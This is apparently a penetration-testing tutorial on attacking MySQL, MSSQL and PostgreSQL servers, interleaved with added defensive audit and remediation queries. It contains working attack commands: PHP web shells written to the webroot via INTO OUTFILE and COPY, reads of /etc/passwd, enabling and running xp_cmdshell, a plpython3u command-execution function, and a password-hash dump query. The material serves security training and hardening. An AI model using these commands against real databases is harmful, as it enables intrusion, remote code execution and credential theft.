Database Exploits

Database exploits target weaknesses in database servers, configurations, authentication, and query execution. After enumeration reveals versions, users, databases, and permissions, exploitation focuses on gaining unauthorized access, reading sensitive data, escalating privileges, or achieving remote code execution. MySQL, MSSQL, and PostgreSQL each expose unique attack surfaces depending on configuration and version.

Understanding Database Attack Surface

Common weaknesses across databases include:

  • Default or weak credentials

  • Excessive user privileges

  • Exposed internal functions

  • Outdated or vulnerable versions

  • Trust authentication settings

  • Arbitrary file read or write capabilities

  • Misconfigured remote access

  • Unsafe stored procedures

  • SQL functions that execute system commands

Exploitation combines authentication flaws, configuration weaknesses, and protocol behavior.

Exploiting MySQL

MySQL often suffers from weak authentication, open remote access, and permission issues.

Exploiting Weak or No Passwords

mysql -h 10.10.10.5 -u root

If login succeeds without a password, the server is severely misconfigured.

Privilege Escalation via FILE Privilege

If a user has FILE privileges, MySQL can read or write system files.

Reading System Files

SELECT LOAD_FILE('/etc/passwd');

This reveals sensitive files only if the account holds FILE, secure_file_priv permits the path, and the mysqld OS user can read the file; otherwise LOAD_FILE() silently returns NULL.

Writing Web Shells (When the Webroot Is Mapped, Writable, and In Scope)

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Writable locations allow remote code execution through the web server, provided secure_file_priv permits the path and the mysqld OS user can write there; INTO OUTFILE refuses to overwrite an existing file.

Gaining Command Execution (UDF Exploitation)

MySQL allows loading user-defined functions (UDFs) from shared libraries in plugin_dir; on misconfigured servers this can be abused for command execution.

Steps include:

  • Uploading a malicious shared object

  • Creating a UDF function linked to system commands

  • Executing operating system commands via SQL

This technique works only on outdated and misconfigured servers.
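The following audit and remediation queries are an added example, not part of the original page or of MySQL's documentation. They check the conditions the FILE and UDF sections above depend on, assuming MySQL 5.7 or 8.0 and a session that can read the mysql schema; 'app'@'%' is a placeholder account name.

```sql
-- Added example (not from the original page). Audits the conditions the FILE
-- and UDF sections depend on, then removes them. Assumes MySQL 5.7/8.0 and a
-- session that can read the mysql schema; 'app'@'%' is a placeholder account.

-- 1. Accounts that log in with no password (why "mysql -u root" can succeed).
SELECT user, host, plugin
FROM mysql.user
WHERE authentication_string = ''
  AND plugin NOT IN ('auth_socket', 'unix_socket');   -- socket auth is not a weak password

-- 2. Accounts holding the global FILE privilege needed for LOAD_FILE / INTO OUTFILE.
SELECT user, host
FROM mysql.user
WHERE File_priv = 'Y';

-- 3. Where file reads/writes may go. NULL = file operations disabled entirely,
--    '' = anywhere the mysqld OS user can reach (weak), a path = confined there.
--    The variable is read-only at runtime; set secure_file_priv in my.cnf and restart.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 4. Directory a UDF shared object would have to land in, and UDFs already registered.
--    Any row in mysql.func that you did not create deserves an incident ticket.
SHOW VARIABLES LIKE 'plugin_dir';
SELECT name, dl FROM mysql.func;

-- 5. Remediation: take FILE away from application accounts and give root a password.
REVOKE FILE ON *.* FROM 'app'@'%';
ALTER USER 'root'@'localhost' IDENTIFIED BY 'CHANGE_ME_to_a_strong_password';
```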

Exploiting MSSQL

MSSQL integrates with Windows authentication and Active Directory. Misconfigurations often expose powerful stored procedures.

Exploiting xp_cmdshell

If xp_cmdshell is enabled, attackers can execute system commands.

Checking xp_cmdshell status (sp_configure only lists advanced options such as this one once 'show advanced options' is set to 1; before that it returns an error):

EXEC sp_configure 'xp_cmdshell';

Enabling it (only if privileged and allowed):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Executing commands:

EXEC xp_cmdshell 'whoami';

This grants command execution as the account the SQL Server service runs under.

Using Impacket for Remote Code Execution

mssqlclient.py user@10.10.10.5 -windows-auth

If xp_cmdshell is enabled, the same path gives command execution as the SQL Server service account, from which pentesters escalate to full system access.

Abuse of Linked Servers

MSSQL environments often have linked servers between hosts.

Checking linked servers:

EXEC sp_linkedservers;

If misconfigured, attackers may pivot using the privileges of remote SQL servers.

Extracting Credentials

MSSQL stores password hashes for SQL logins (not Windows logins) in sys.sql_logins; reading them requires sysadmin membership or the CONTROL SERVER permission.

SELECT name, password_hash FROM sys.sql_logins;

Hashes may be cracked offline.
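The following queries are an added example, not part of the original page or of Microsoft's documentation. They audit and revert the MSSQL settings the xp_cmdshell, linked-server and credential sections above rely on, assuming a sysadmin session; [app_login] is a placeholder login name.

```sql
-- Added example (not from the original page). Audits and reverts the MSSQL
-- settings abused above. Assumes sysadmin; [app_login] is a placeholder login.

-- 1. Current state of xp_cmdshell without touching 'show advanced options'
--    (sys.configurations shows advanced options even when sp_configure hides them).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');

-- 2. Disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Linked servers and how local logins map to them. A mapping with
--    local_principal_id = 0 applies to every login; a fixed remote_name means
--    all of them reach the remote server as that one identity.
SELECT s.name AS linked_server, s.data_source,
       CASE WHEN l.local_principal_id = 0 THEN '(all logins)'
            ELSE SUSER_NAME(l.local_principal_id) END AS local_login,
       l.uses_self_credential, l.remote_name
FROM sys.servers AS s
JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;

-- 4. Who can read the hashes in sys.sql_logins: every member of sysadmin.
SELECT m.name AS member, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 5. Harden logins: disable sa, enforce Windows password policy on SQL logins.
ALTER LOGIN sa DISABLE;
ALTER LOGIN [app_login] WITH CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
```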

Exploiting PostgreSQL

PostgreSQL supports trust authentication and file access through COPY commands.

Abusing Trust Authentication

If pg_hba.conf allows trust authentication:

psql -h 10.10.10.5 -U postgres

Login succeeds without a password.

Reading Files via COPY

CREATE TABLE config_file (content text);
COPY config_file FROM '/etc/passwd';
SELECT content FROM config_file;

PostgreSQL can read files from the host depending on permissions: server-side COPY FROM a file requires superuser or membership in pg_read_server_files (PostgreSQL 11+), and the read happens as the postgres OS user.

Writing Files via COPY

COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

Writable file paths allow remote code execution. COPY TO a file requires superuser or pg_write_server_files, and the file is written as the postgres OS user, so that user must have write access to the directory.

Command Execution via Extensions

PostgreSQL supports extensions such as:

  • plpython

  • plperl

  • plpgsql

If superuser access is available, pentesters can create functions in an untrusted language that execute system commands. Only untrusted languages (plpython3u, plperlu) can reach the operating system; plpgsql and other trusted languages cannot.

Example:

CREATE EXTENSION IF NOT EXISTS plpython3u;  -- plpythonu (Python 2) was removed in PostgreSQL 13

CREATE FUNCTION exec_cmd(cmd text) RETURNS text AS $$
import subprocess
# check_output returns bytes; decode so the text return type receives a str
return subprocess.check_output(cmd, shell=True).decode()
$$ LANGUAGE plpython3u;

Executing commands:

SELECT exec_cmd('id');

Creating untrusted-language extensions and functions requires superuser.
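The following queries are an added example, not part of the original page or of the PostgreSQL documentation. They audit the conditions behind the trust-login, COPY and extension sections above and remove them, assuming PostgreSQL 11 or later and a superuser session; app is a placeholder role name.

```sql
-- Added example (not from the original page). Audits the conditions behind
-- the trust, COPY and extension sections, then removes them. Assumes
-- PostgreSQL 11+ and a superuser session; 'app' is a placeholder role.

-- 1. pg_hba.conf rules that use trust (no password at all), as the running
--    server parsed them. Any row here is a finding.
SELECT line_number, type, database, user_name, address, auth_method
FROM pg_hba_file_rules
WHERE auth_method = 'trust';

-- 2. Superusers, and non-superusers granted server-side file or program access
--    (all that COPY ... FROM/TO a file or PROGRAM needs).
SELECT rolname FROM pg_roles WHERE rolsuper;

SELECT r.rolname AS member, g.rolname AS granted_role
FROM pg_auth_members AS m
JOIN pg_roles AS r ON r.oid = m.member
JOIN pg_roles AS g ON g.oid = m.roleid
WHERE g.rolname IN ('pg_read_server_files', 'pg_write_server_files',
                    'pg_execute_server_program');

-- 3. Untrusted procedural languages already installed. Only these can reach
--    the OS; trusted languages such as plpgsql cannot.
SELECT lanname FROM pg_language WHERE lanispl AND NOT lanpltrusted;

-- 4. Remediation: drop the command-execution function and the language
--    behind it, and take the file roles away from application accounts.
DROP FUNCTION IF EXISTS exec_cmd(text);
DROP EXTENSION IF EXISTS plpython3u;
REVOKE pg_read_server_files, pg_write_server_files, pg_execute_server_program FROM app;

-- 5. In pg_hba.conf, replace each trust line with a hashed-password method,
--    e.g.  host  all  all  10.10.10.0/24  scram-sha-256   then reload:
SELECT pg_reload_conf();
```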

Exploiting Default Credentials

Many database servers deploy with default passwords.

Common examples:

  • MySQL root with no password

  • MSSQL sa with weak password

  • PostgreSQL postgres with default access

Credential spraying across databases often reveals weak setups.

Exploiting Outdated or Vulnerable Versions

Database servers frequently contain version-specific vulnerabilities.

Examples include:

  • MySQL privilege escalation flaws

  • MSSQL remote code execution issues

  • PostgreSQL authentication bypass vulnerabilities

Pentesters match version data with public CVEs after enumeration.

Exploiting Remote Access Misconfigurations

Databases that allow external connections from any host are exposed.

Checking bind interfaces:

bind-address = 0.0.0.0

This configuration makes the server listen on every interface; combined with a user account permitted from any host ('%'), it exposes the database to every machine that can reach the service port.

Why Database Exploitation Matters

Databases store sensitive information such as credentials, business data, logs, API keys, and user information. Exploiting misconfigurations or vulnerabilities often results in:

  • Unauthorized data access

  • System-level remote code execution

  • Credential harvesting

  • Lateral movement

  • Full environment compromise

Databases are high-value targets, and weak configurations often make them accessible during network pentests.

Intel Dump

  • Database exploits target weak credentials, misconfigurations, outdated versions, and unsafe file access

  • MySQL supports FILE read/write and UDF-based execution

  • MSSQL exposes xp_cmdshell, linked servers, and NTLM-based authentication

  • PostgreSQL can read/write files via COPY and run commands via extensions

  • Remote access misconfigurations expose databases to unauthorized attacks

  • Database exploitation often yields full system compromise
